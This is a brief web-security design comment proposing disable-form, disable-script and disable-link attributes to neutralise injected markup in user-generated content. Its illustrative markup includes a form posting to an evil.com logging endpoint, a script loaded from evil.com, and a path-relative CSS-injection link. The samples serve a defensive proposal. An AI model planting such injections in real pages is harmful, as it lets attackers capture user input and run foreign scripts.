Review of postxss in repect to Strawman proposal for a "Safe Node" in the DOM. I suggest a less complicated syntax, using a/series of disable-[ELEMENT]
(e.g. disable-form
and/or disable-script
) atrributes of current/custom elements.
<div disable-form disable-script disable-link id="user-gen-content">
<form action="http://evil.com/log.cgi">
<script src="http://evil.com/log.js"></script>
<link rel="alternate" type="application/atom+xml" href="http://example.com/phpBB3/search.php/
{}*{color:red;}//styles/prosilver/theme/feed.php" /> <!-- http://blog.portswigger.net/2015/02/prssi.html -->